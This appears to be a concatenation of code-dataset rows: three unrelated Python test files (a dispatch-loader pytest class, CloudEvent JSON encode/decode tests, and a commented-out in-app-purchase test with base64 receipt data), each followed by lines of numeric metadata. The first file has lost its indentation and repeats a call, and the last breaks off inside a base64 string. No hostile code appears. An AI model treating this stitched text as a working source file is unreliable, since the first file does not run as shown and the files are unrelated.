class TestFileDispatchLoaderIntegration():
@pytest.fixture
def dispatch_files(self, text_files):
return text_files({'test1.txt': 'Test text 1', 'test2.txt': 'Test text 2',
'test3.txt': 'Test text 3', 'test4.txt': 'Test text 4'})
def test_with_no_dispatch_creation_or_removal(self, dispatch_files, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '67890',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '78654',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
loader_config = {'dispatch_config_paths': [str(dispatch_config_dir / 'dispatch_config_1.toml'),
str(dispatch_config_dir / 'dispatch_config_2.toml')],
'dispatch_template_path': str(dispatch_files)}
loader = file_dispatchloader.init_dispatch_loader({'file_dispatchloader': loader_config})
r_dispatch_config = file_dispatchloader.get_dispatch_config(loader)
r_dispatch_text = file_dispatchloader.get_dispatch_template(loader, 'test1')
file_dispatchloader.cleanup_dispatch_loader(loader)
assert r_dispatch_config['nation1']['test4']['ns_id'] == '98765'
assert r_dispatch_text == 'Test text 1'
def test_with_one_dispatch_creation_and_one_removal(self, dispatch_files, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '78654',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'action': 'remove',
'ns_id': '98765',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
loader_config = {'dispatch_config_paths': [str(dispatch_config_dir / 'dispatch_config_1.toml'),
str(dispatch_config_dir / 'dispatch_config_2.toml')],
'dispatch_template_path': str(dispatch_files)}
loader = file_dispatchloader.init_dispatch_loader({'file_dispatchloader': loader_config})
loader = file_dispatchloader.init_dispatch_loader({'file_dispatchloader': loader_config})
r_dispatch_config = file_dispatchloader.get_dispatch_config(loader)
r_dispatch_text = file_dispatchloader.get_dispatch_template(loader, 'test1')
file_dispatchloader.add_dispatch_id(loader, 'test2', '54321')
file_dispatchloader.cleanup_dispatch_loader(loader)
assert r_dispatch_config['nation1']['test4']['action'] == 'remove'
assert r_dispatch_text == 'Test text 1'
assert toml.load(dispatch_config_dir / 'dispatch_config_1.toml')['nation1']['test2']['ns_id'] == '54321'
| 60.987539 | 112 | 0.379425 | 1,411 | 19,577 | 4.962438 | 0.076541 | 0.179949 | 0.097972 | 0.160954 | 0.844901 | 0.820766 | 0.798772 | 0.775636 | 0.751071 | 0.732077 | 0 | 0.065729 | 0.509629 | 19,577 | 320 | 113 | 61.178125 | 0.663646 | 0 | 0 | 0.768421 | 0 | 0 | 0.196608 | 0.027992 | 0 | 0 | 0 | 0 | 0.045614 | 1 | 0.035088 | false | 0 | 0.02807 | 0.003509 | 0.077193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fa1cc722f3bfa32178e6b87fc3a5b810eccf5ac0 | 11,079 | py | Python | tests/json_test.py | scaleplandev/spce-python | 34e98e382a09d2d51877bd4c83efc26a8f12c1fc | [
"Apache-2.0"
] | null | null | null | tests/json_test.py | scaleplandev/spce-python | 34e98e382a09d2d51877bd4c83efc26a8f12c1fc | [
"Apache-2.0"
] | null | null | null | tests/json_test.py | scaleplandev/spce-python | 34e98e382a09d2d51877bd4c83efc26a8f12c1fc | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Scale Plan Yazılım A.Ş.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
from spce import CloudEvent, Json
class JsonEncoderTests(unittest.TestCase):
def test_encode_required(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
)
encoded = Json.encode(event)
target = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_optional(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
subject="subject1",
dataschema="https://particlemetrics.com/schema",
time="2020-09-28T21:33:21Z"
)
encoded = Json.encode(event)
target = '''
{"dataschema": "https://particlemetrics.com/schema",
"id": "1000",
"source": "oximeter/123",
"specversion": "1.0",
"subject": "subject1",
"time": "2020-09-28T21:33:21Z",
"type": "OximeterMeasured"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_string_data(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=json.dumps({"spo2": 99}),
datacontenttype="application/json"
)
encoded = Json.encode(event)
target = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_binary_data(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=b'\x01\x02\x03\x04',
datacontenttype="application/octet-stream"
)
encoded = Json.encode(event)
target = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/octet-stream",
"data_base64": "AQIDBA=="
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_extension_attribute(self):
event = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
external1="foo/bar"
)
encoded = Json.encode(event)
target = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"external1": "foo/bar"
}
'''
self.assertEqual(json.loads(target), json.loads(encoded))
def test_encode_batch_0_items(self):
self.assertEqual("[]", Json.encode([]))
def test_encode_batch_1_item(self):
event_batch = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
)
]
encoded_batch = Json.encode(event_batch)
target = r'''
[{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}]
'''
self.assertEqual(json.loads(target), json.loads(encoded_batch))
def test_encode_batch_2_items(self):
event_batch = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
),
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1001",
datacontenttype="application/json",
data=b'\x01binarydata\x02',
),
]
encoded_batch = Json.encode(event_batch)
target = r'''
[
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
},
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1001",
"specversion":"1.0",
"datacontenttype": "application/json",
"data_base64": "AWJpbmFyeWRhdGEC"
}
]
'''
self.assertEqual(json.loads(target), json.loads(encoded_batch))
class JsonDecoderTests(unittest.TestCase):
def test_decode_required(self):
encoded_event = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_optional(self):
encoded_event = '''
{"dataschema": "https://particlemetrics.com/schema",
"id": "1000",
"source": "oximeter/123",
"specversion": "1.0",
"subject": "subject1",
"time": "2020-09-28T21:33:21Z",
"type": "OximeterMeasured"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
subject="subject1",
dataschema="https://particlemetrics.com/schema",
time="2020-09-28T21:33:21Z"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_string_data(self):
encoded_event = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=json.dumps({"spo2": 99}),
datacontenttype="application/json"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_binary_data(self):
encoded_event = r'''
{
"type": "OximeterMeasured",
"source": "oximeter/123",
"id": "1000",
"specversion": "1.0",
"datacontenttype": "application/octet-stream",
"data_base64": "AQIDBA=="
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
data=b'\x01\x02\x03\x04',
datacontenttype="application/octet-stream"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_extension_attribute(self):
encoded_event = '''
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"external1": "foo/bar"
}
'''
target = CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
external1="foo/bar"
)
event = Json.decode(encoded_event)
self.assertEqual(target, event)
def test_decode_batch_0_items(self):
self.assertEqual([], Json.decode("[]"))
def test_decode_batch_1_item(self):
encoded_batch = r'''
[{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
}]
'''
target = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
)
]
self.assertEqual(target, Json.decode(encoded_batch))
def test_decode_batch_2_items(self):
encoded_batch = r'''
[
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1000",
"specversion":"1.0",
"datacontenttype": "application/json",
"data": "{\"spo2\": 99}"
},
{
"type":"OximeterMeasured",
"source":"oximeter/123",
"id":"1001",
"specversion":"1.0",
"datacontenttype": "application/json",
"data_base64": "AWJpbmFyeWRhdGEC"
}
]
'''
target = [
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1000",
datacontenttype="application/json",
data=json.dumps({"spo2": 99}),
),
CloudEvent(
type="OximeterMeasured",
source="oximeter/123",
id="1001",
datacontenttype="application/json",
data=b'\x01binarydata\x02',
),
]
self.assertEqual(target, Json.decode(encoded_batch))
| 31.208451 | 74 | 0.476848 | 906 | 11,079 | 5.747241 | 0.15011 | 0.122911 | 0.104475 | 0.19589 | 0.843864 | 0.838487 | 0.838487 | 0.808911 | 0.808911 | 0.784521 | 0 | 0.059179 | 0.386858 | 11,079 | 354 | 75 | 31.29661 | 0.707346 | 0.050546 | 0 | 0.783699 | 0 | 0 | 0.495383 | 0.061685 | 0 | 0 | 0 | 0 | 0.050157 | 1 | 0.050157 | false | 0 | 0.009404 | 0 | 0.065831 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fa33fc5a2ee868f6e94353525baf369faa2924b0 | 10,762 | py | Python | website/drawquest/apps/iap/tests.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | [
"BSD-3-Clause"
] | 61 | 2015-11-10T17:13:46.000Z | 2021-08-06T17:58:30.000Z | website/drawquest/apps/iap/tests.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | [
"BSD-3-Clause"
] | 13 | 2015-11-11T07:49:41.000Z | 2021-06-09T03:45:31.000Z | website/drawquest/apps/iap/tests.py | bopopescu/drawquest-web | 8d8f9149b6efeb65202809a5f8916386f58a1b3b | [
"BSD-3-Clause"
] | 18 | 2015-11-11T04:50:04.000Z | 2021-08-20T00:57:11.000Z | import base64
from drawquest.tests.tests_helpers import (CanvasTestCase, create_content, create_user, create_group,
create_comment, create_staff, create_quest, create_quest_comment)
from drawquest import economy
from services import Services, override_service
#class TestIap(CanvasTestCase):
# def test_purchasing_coins(self):
# user = create_user()
# data = 'ewoJInNpZ25hdHVyZSIgPSAiQWdKd2tNVzQrNTh6cGpNUG9Ga1NxamtyM0p1R0tk\r\nczVJVGIvYlhzeUd2MXZ0MndYQWl6N3htQmFUYVVua2RRM25oM2dBdFM2TnFnWjFS\r\nbUVWbEhkQW01N2pEQ1FYQk1Uc0ZUeFA3cDFlbnBrUXR3cUxGTHdDajZmbEowTXEw\r\ndFRIRUtnOGlKa0ptSmFtQjRjLy9xZ1VFanJWQ2Nid0ZwOXZneHdYYWo5WDVaeEFB\r\nQURWekNDQTFNd2dnSTdvQU1DQVFJQ0NHVVVrVTNaV0FTMU1BMEdDU3FHU0liM0RR\r\nRUJCUVVBTUg4eEN6QUpCZ05WQkFZVEFsVlRNUk13RVFZRFZRUUtEQXBCY0hCc1pT\r\nQkpibU11TVNZd0pBWURWUVFMREIxQmNIQnNaU0JEWlhKMGFXWnBZMkYwYVc5dUlF\r\nRjFkR2h2Y21sMGVURXpNREVHQTFVRUF3d3FRWEJ3YkdVZ2FWUjFibVZ6SUZOMGIz\r\nSmxJRU5sY25ScFptbGpZWFJwYjI0Z1FYVjBhRzl5YVhSNU1CNFhEVEE1TURZeE5U\r\nSXlNRFUxTmxvWERURTBNRFl4TkRJeU1EVTFObG93WkRFak1DRUdBMVVFQXd3YVVI\r\nVnlZMmhoYzJWU1pXTmxhWEIwUTJWeWRHbG1hV05oZEdVeEd6QVpCZ05WQkFzTUVr\r\nRndjR3hsSUdsVWRXNWxjeUJUZEc5eVpURVRNQkVHQTFVRUNnd0tRWEJ3YkdVZ1NX\r\nNWpMakVMTUFrR0ExVUVCaE1DVlZNd2daOHdEUVlKS29aSWh2Y05BUUVCQlFBRGdZ\r\nMEFNSUdKQW9HQkFNclJqRjJjdDRJclNkaVRDaGFJMGc4cHd2L2NtSHM4cC9Sd1Yv\r\ncnQvOTFYS1ZoTmw0WElCaW1LalFRTmZnSHNEczZ5anUrK0RyS0pFN3VLc3BoTWRk\r\nS1lmRkU1ckdYc0FkQkVqQndSSXhleFRldngzSExFRkdBdDFtb0t4NTA5ZGh4dGlJ\r\nZERnSnYyWWFWczQ5QjB1SnZOZHk2U01xTk5MSHNETHpEUzlvWkhBZ01CQUFHamNq\r\nQndNQXdHQTFVZEV3RUIvd1FDTUFBd0h3WURWUjBqQkJnd0ZvQVVOaDNvNHAyQzBn\r\nRVl0VEpyRHRkREM1RllRem93RGdZRFZSMFBBUUgvQkFRREFnZUFNQjBHQTFVZERn\r\nUVdCQlNwZzRQeUdVakZQaEpYQ0JUTXphTittVjhrOVRBUUJnb3Foa2lHOTJOa0Jn\r\nVUJCQUlGQURBTkJna3Foa2lHOXcwQkFRVUZBQU9DQVFFQUVhU2JQanRtTjRDL0lC\r\nM1FFcEszMlJ4YWNDRFhkVlhBZVZSZVM1RmFaeGMrdDg4cFFQOTNCaUF4dmRXLzNl\r\nVFNNR1k1RmJlQVlMM2V0cVA1Z204d3JGb2pYMGlreVZSU3RRKy9BUTBLRWp0cUIw\r\nN2tMczlRVWU4Y3pSOFVHZmRNMUV1bVYvVWd2RGQ0TndOWXhMUU1nNFdUUWZna1FR\r\nVnk4R1had1ZIZ2JFL1VDNlk3MDUzcEdYQms1MU5QTTN3b3hoZDNnU1JMdlhqK2xv\r\nSHNTdGNURXFlOXBCRHBtRzUrc2s0dHcrR0szR01lRU41LytlMVFUOW5wL0tsMW5q\r\nK2FCdzdDMHhzeTBiRm5hQWQxY1NTNnhkb3J5L0NVdk02Z3RLc21uT09kcVRlc2Jw\r\nMGJzOHNuNldxczBDOWRnY3hSSHVPTVoydG04bnBMVW03YXJnT1N6UT09IjsKCSJw\r\ndXJjaGFzZS1pbmZvIiA9ICJld29KSW05eWFXZHBibUZzTFhCMWNtTm9ZWE5sTFdS\r\naGRHVXRjSE4wSWlBOUlDSXlNREV5TFRFeExUQTVJREExT2pVM09qTTNJRUZ0WlhK\r\ncFkyRXZURzl6WDBGdVoyVnNaWE1pT3dvSkluVnVhWEYxWlMxcFpHVnVkR2xtYVdW\r\neUlpQTlJQ0l3TURBd1lqQXdPVEk0TVRnaU93b0pJbTl5YVdkcGJtRnNMWFJ5WVc1\r\nellXTjBhVzl1TFdsa0lpQTlJQ0l4TURBd01EQXdNRFU0TXpZMU16SXlJanNLQ1NK\r\naWRuSnpJaUE5SUNJeExqQWlPd29KSW5SeVlXNXpZV04wYVc5dUxXbGtJaUE5SUNJ\r\neE1EQXdNREF3TURVNE16WTFNekl5SWpzS0NTSnhkV0Z1ZEdsMGVTSWdQU0FpTVNJ\r\nN0Nna2liM0pwWjJsdVlXd3RjSFZ5WTJoaGMyVXRaR0YwWlMxdGN5SWdQU0FpTVRN\r\nMU1qUTJPVFExTnpRMk9DSTdDZ2tpY0hKdlpIVmpkQzFwWkNJZ1BTQWlZWE11WTJG\r\ndWRpNWtjbUYzY1hWbGMzUXVjSEp2WkhWamRITXVZMjlwYm5NdU1UQXdJanNLQ1NK\r\ncGRHVnRMV2xrSWlBOUlDSTFOelk1TWpFeU1ESWlPd29KSW1KcFpDSWdQU0FpWVhN\r\ndVkyRnVkaTVrY21GM2NYVmxjM1FpT3dvSkluQjFjbU5vWVhObExXUmhkR1V0YlhN\r\naUlEMGdJakV6TlRJME5qazBOVGMwTmpnaU93b0pJbkIxY21Ob1lYTmxMV1JoZEdV\r\naUlEMGdJakl3TVRJdE1URXRNRGtnTVRNNk5UYzZNemNnUlhSakwwZE5WQ0k3Q2dr\r\naWNIVnlZMmhoYzJVdFpHRjBaUzF3YzNRaUlEMGdJakl3TVRJdE1URXRNRGtnTURV\r\nNk5UYzZNemNnUVcxbGNtbGpZUzlNYjNOZlFXNW5aV3hsY3lJN0Nna2liM0pwWjJs\r\ndVlXd3RjSFZ5WTJoaGMyVXRaR0YwWlNJZ1BTQWlNakF4TWkweE1TMHdPU0F4TXpv\r\nMU56b3pOeUJGZEdNdlIwMVVJanNLZlE9PSI7CgkiZW52aXJvbm1lbnQiID0gIlNh\r\nbmRib3giOwoJInBvZCIgPSAiMTAwIjsKCSJzaWduaW5nLXN0YXR1cyIgPSAiMCI7\r\nCn0='
# #data = 'ewoJInNpZ25hdHVyZSIgPSAiQWdvL29UYUE4YjhocHorMVVmZ1hDYlFnRDM2U3dN\r\nd05EVi9SN3hCUzQvUm0xbVB3TWE3bGNjMFVnZ1llaTRNTEJQa003YStzcklhaThn\r\nQzJkR0psdHJidUw1NlRQYTFNQWllRzNrMitoVXd4SDQ5ckE5K2FCMzA1aCtkRHVu\r\nVFRKTWRmUVozcjB0emM5enZzZ0ZvL3NVeU9yTGFwWFFEVGh6S2JramtmbDQ3K0FB\r\nQURWekNDQTFNd2dnSTdvQU1DQVFJQ0NHVVVrVTNaV0FTMU1BMEdDU3FHU0liM0RR\r\nRUJCUVVBTUg4eEN6QUpCZ05WQkFZVEFsVlRNUk13RVFZRFZRUUtEQXBCY0hCc1pT\r\nQkpibU11TVNZd0pBWURWUVFMREIxQmNIQnNaU0JEWlhKMGFXWnBZMkYwYVc5dUlF\r\nRjFkR2h2Y21sMGVURXpNREVHQTFVRUF3d3FRWEJ3YkdVZ2FWUjFibVZ6SUZOMGIz\r\nSmxJRU5sY25ScFptbGpZWFJwYjI0Z1FYVjBhRzl5YVhSNU1CNFhEVEE1TURZeE5U\r\nSXlNRFUxTmxvWERURTBNRFl4TkRJeU1EVTFObG93WkRFak1DRUdBMVVFQXd3YVVI\r\nVnlZMmhoYzJWU1pXTmxhWEIwUTJWeWRHbG1hV05oZEdVeEd6QVpCZ05WQkFzTUVr\r\nRndjR3hsSUdsVWRXNWxjeUJUZEc5eVpURVRNQkVHQTFVRUNnd0tRWEJ3YkdVZ1NX\r\nNWpMakVMTUFrR0ExVUVCaE1DVlZNd2daOHdEUVlKS29aSWh2Y05BUUVCQlFBRGdZ\r\nMEFNSUdKQW9HQkFNclJqRjJjdDRJclNkaVRDaGFJMGc4cHd2L2NtSHM4cC9Sd1Yv\r\ncnQvOTFYS1ZoTmw0WElCaW1LalFRTmZnSHNEczZ5anUrK0RyS0pFN3VLc3BoTWRk\r\nS1lmRkU1ckdYc0FkQkVqQndSSXhleFRldngzSExFRkdBdDFtb0t4NTA5ZGh4dGlJ\r\nZERnSnYyWWFWczQ5QjB1SnZOZHk2U01xTk5MSHNETHpEUzlvWkhBZ01CQUFHamNq\r\nQndNQXdHQTFVZEV3RUIvd1FDTUFBd0h3WURWUjBqQkJnd0ZvQVVOaDNvNHAyQzBn\r\nRVl0VEpyRHRkREM1RllRem93RGdZRFZSMFBBUUgvQkFRREFnZUFNQjBHQTFVZERn\r\nUVdCQlNwZzRQeUdVakZQaEpYQ0JUTXphTittVjhrOVRBUUJnb3Foa2lHOTJOa0Jn\r\nVUJCQUlGQURBTkJna3Foa2lHOXcwQkFRVUZBQU9DQVFFQUVhU2JQanRtTjRDL0lC\r\nM1FFcEszMlJ4YWNDRFhkVlhBZVZSZVM1RmFaeGMrdDg4cFFQOTNCaUF4dmRXLzNl\r\nVFNNR1k1RmJlQVlMM2V0cVA1Z204d3JGb2pYMGlreVZSU3RRKy9BUTBLRWp0cUIw\r\nN2tMczlRVWU4Y3pSOFVHZmRNMUV1bVYvVWd2RGQ0TndOWXhMUU1nNFdUUWZna1FR\r\nVnk4R1had1ZIZ2JFL1VDNlk3MDUzcEdYQms1MU5QTTN3b3hoZDNnU1JMdlhqK2xv\r\nSHNTdGNURXFlOXBCRHBtRzUrc2s0dHcrR0szR01lRU41LytlMVFUOW5wL0tsMW5q\r\nK2FCdzdDMHhzeTBiRm5hQWQxY1NTNnhkb3J5L0NVdk02Z3RLc21uT09kcVRlc2Jw\r\nMGJzOHNuNldxczBDOWRnY3hSSHVPTVoydG04bnBMVW03YXJnT1N6UT09IjsKCSJw\r\ndXJjaGFzZS1pbmZvIiA9ICJld29KSW05eWFXZHBibUZzTFhCMWNtTm9ZWE5sTFdS\r\naGRHVXRjSE4wSWlBOUlDSXlNREV6TFRBeExURXdJREUyT2pBNE9qSTJJRUZ0WlhK\r\ncFkyRXZURzl6WDBGdVoyVnNaWE1pT3dvSkluQjFjbU5vWVhObExXUmhkR1V0YlhN\r\naUlEMGdJakV6TlRjNE5qSTVNRFk1T1RjaU93b0pJblZ1YVhGMVpTMXBaR1Z1ZEds\r\nbWFXVnlJaUE5SUNJM01ESTJZVGM1TXpjNVptUmtZakZqTmpjNU1XRm1OVE13TW1F\r\nMlpUVTFNbVU0TnpCaVlqY3hJanNLQ1NKdmNtbG5hVzVoYkMxMGNtRnVjMkZqZEds\r\ndmJpMXBaQ0lnUFNBaU1qTXdNREF3TURJME5qQTJPRFEzSWpzS0NTSmlkbkp6SWlB\r\nOUlDSXhMakFpT3dvSkltRndjQzFwZEdWdExXbGtJaUE5SUNJMU56WTVNVGMwTWpV\r\naU93b0pJblJ5WVc1ellXTjBhVzl1TFdsa0lpQTlJQ0l5TXpBd01EQXdNalEyTURZ\r\nNE5EY2lPd29KSW5GMVlXNTBhWFI1SWlBOUlDSXhJanNLQ1NKdmNtbG5hVzVoYkMx\r\nd2RYSmphR0Z6WlMxa1lYUmxMVzF6SWlBOUlDSXhNelUzT0RZeU9UQTJPVGszSWpz\r\nS0NTSjFibWx4ZFdVdGRtVnVaRzl5TFdsa1pXNTBhV1pwWlhJaUlEMGdJalJHTWtK\r\nRFEwWXhMVGhGTVRjdE5EYzVNQzFDUTBNNUxVUkdNRVkzTURjME1EZEVNU0k3Q2dr\r\naWFYUmxiUzFwWkNJZ1BTQWlOVGMyT1RJeE1qQXlJanNLQ1NKMlpYSnphVzl1TFdW\r\nNGRHVnlibUZzTFdsa1pXNTBhV1pwWlhJaUlEMGdJakV4T1RBek1UUTBJanNLQ1NK\r\nd2NtOWtkV04wTFdsa0lpQTlJQ0poY3k1allXNTJMbVJ5WVhkeGRXVnpkQzV3Y205\r\na2RXTjBjeTVqYjJsdWN5NHhNREFpT3dvSkluQjFjbU5vWVhObExXUmhkR1VpSUQw\r\nZ0lqSXdNVE10TURFdE1URWdNREE2TURnNk1qWWdSWFJqTDBkTlZDSTdDZ2tpYjNK\r\ncFoybHVZV3d0Y0hWeVkyaGhjMlV0WkdGMFpTSWdQU0FpTWpBeE15MHdNUzB4TVNB\r\nd01Eb3dPRG95TmlCRmRHTXZSMDFVSWpzS0NTSmlhV1FpSUQwZ0ltRnpMbU5oYm5Z\r\ndVpISmhkM0YxWlhOMElqc0tDU0p3ZFhKamFHRnpaUzFrWVhSbExYQnpkQ0lnUFNB\r\naU1qQXhNeTB3TVMweE1DQXhOam93T0RveU5pQkJiV1Z5YVdOaEwweHZjMTlCYm1k\r\nbGJHVnpJanNLZlE9PSI7CgkicG9kIiA9ICIyMyI7Cgkic2lnbmluZy1zdGF0dXMi\r\nID0gIjAiOwp9'
# #data = 'ewoJInNpZ25hdHVyZSIgPSAiQWdvL29UYUE4YjhocHorMVVmZ1hDYlFnRDM2U3dNd05EVi9SN3hCUzQvUm0xbVB3TWE3bGNjMFVnZ1llaTRNTEJQa003YStzcklhaThnQzJkR0psdHJidUw1NlRQYTFNQWllRzNrMitoVXd4SDQ5ckE5K2FCMzA1aCtkRHVuVFRKTWRmUVozcjB0emM5enZzZ0ZvL3NVeU9yTGFwWFFEVGh6S2JramtmbDQ3K0FBQURWekNDQTFNd2dnSTdvQU1DQVFJQ0NHVVVrVTNaV0FTMU1BMEdDU3FHU0liM0RRRUJCUVVBTUg4eEN6QUpCZ05WQkFZVEFsVlRNUk13RVFZRFZRUUtEQXBCY0hCc1pTQkpibU11TVNZd0pBWURWUVFMREIxQmNIQnNaU0JEWlhKMGFXWnBZMkYwYVc5dUlFRjFkR2h2Y21sMGVURXpNREVHQTFVRUF3d3FRWEJ3YkdVZ2FWUjFibVZ6SUZOMGIzSmxJRU5sY25ScFptbGpZWFJwYjI0Z1FYVjBhRzl5YVhSNU1CNFhEVEE1TURZeE5USXlNRFUxTmxvWERURTBNRFl4TkRJeU1EVTFObG93WkRFak1DRUdBMVVFQXd3YVVIVnlZMmhoYzJWU1pXTmxhWEIwUTJWeWRHbG1hV05oZEdVeEd6QVpCZ05WQkFzTUVrRndjR3hsSUdsVWRXNWxjeUJUZEc5eVpURVRNQkVHQTFVRUNnd0tRWEJ3YkdVZ1NXNWpMakVMTUFrR0ExVUVCaE1DVlZNd2daOHdEUVlKS29aSWh2Y05BUUVCQlFBRGdZMEFNSUdKQW9HQkFNclJqRjJjdDRJclNkaVRDaGFJMGc4cHd2L2NtSHM4cC9Sd1YvcnQvOTFYS1ZoTmw0WElCaW1LalFRTmZnSHNEczZ5anUrK0RyS0pFN3VLc3BoTWRkS1lmRkU1ckdYc0FkQkVqQndSSXhleFRldngzSExFRkdBdDFtb0t4NTA5ZGh4dGlJZERnSnYyWWFWczQ5QjB1SnZOZHk2U01xTk5MSHNETHpEUzlvWkhBZ01CQUFHamNqQndNQXdHQTFVZEV3RUIvd1FDTUFBd0h3WURWUjBqQkJnd0ZvQVVOaDNvNHAyQzBnRVl0VEpyRHRkREM1RllRem93RGdZRFZSMFBBUUgvQkFRREFnZUFNQjBHQTFVZERnUVdCQlNwZzRQeUdVakZQaEpYQ0JUTXphTittVjhrOVRBUUJnb3Foa2lHOTJOa0JnVUJCQUlGQURBTkJna3Foa2lHOXcwQkFRVUZBQU9DQVFFQUVhU2JQanRtTjRDL0lCM1FFcEszMlJ4YWNDRFhkVlhBZVZSZVM1RmFaeGMrdDg4cFFQOTNCaUF4dmRXLzNlVFNNR1k1RmJlQVlMM2V0cVA1Z204d3JGb2pYMGlreVZSU3RRKy9BUTBLRWp0cUIwN2tMczlRVWU4Y3pSOFVHZmRNMUV1bVYvVWd2RGQ0TndOWXhMUU1nNFdUUWZna1FRVnk4R1had1ZIZ2JFL1VDNlk3MDUzcEdYQms1MU5QTTN3b3hoZDNnU1JMdlhqK2xvSHNTdGNURXFlOXBCRHBtRzUrc2s0dHcrR0szR01lRU41LytlMVFUOW5wL0tsMW5qK2FCdzdDMHhzeTBiRm5hQWQxY1NTNnhkb3J5L0NVdk02Z3RLc21uT09kcVRlc2JwMGJzOHNuNldxczBDOWRnY3hSSHVPTVoydG04bnBMVW03YXJnT1N6UT09IjsKCSJwdXJjaGFzZS1pbmZvIiA9ICJld29KSW05eWFXZHBibUZzTFhCMWNtTm9ZWE5sTFdSaGRHVXRjSE4wSWlBOUlDSXlNREV6TFRBeExURXdJREUyT2pBNE9qSTJJRUZ0WlhKcFkyRXZURzl6WDBGdVoyVnNaWE1pT3dvSkluQjFjbU5vWVhObExXUmhkR1V0YlhNaUlEMGdJakV6TlRjNE5qSTVNRFk1T1RjaU93b0pJblZ1YVhGMVpTMXBaR1Z1ZEdsbWFXVnlJaU